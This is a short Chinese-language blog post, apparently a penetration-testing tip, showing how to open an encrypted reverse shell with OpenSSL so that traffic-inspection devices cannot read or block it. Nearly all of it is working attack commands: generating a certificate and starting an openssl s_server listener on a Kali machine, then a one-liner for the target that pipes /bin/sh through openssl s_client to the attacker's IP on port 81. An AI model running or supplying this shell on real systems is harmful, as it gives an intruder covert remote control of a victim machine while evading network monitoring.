小技巧-使用OpenSSL反彈加密shell

滲透測(cè)試人員通常喜歡使用bash、python、nc等方式反彈shell。以上方式有一個(gè)共同的缺點(diǎn),所有的流量都是明文傳輸,很容易被各種流量審查設(shè)備阻斷。下面介紹使用openssl反彈一個(gè)加密的shell。

  1. 在kali上生成SSL證書的公鑰/私鑰對(duì)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  1. 在kali上監(jiān)聽81端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 81
  1. 在目標(biāo)機(jī)器上用openssl反彈加密shell
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.80.137:81 > /tmp/s; rm /tmp/s
image.png
image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容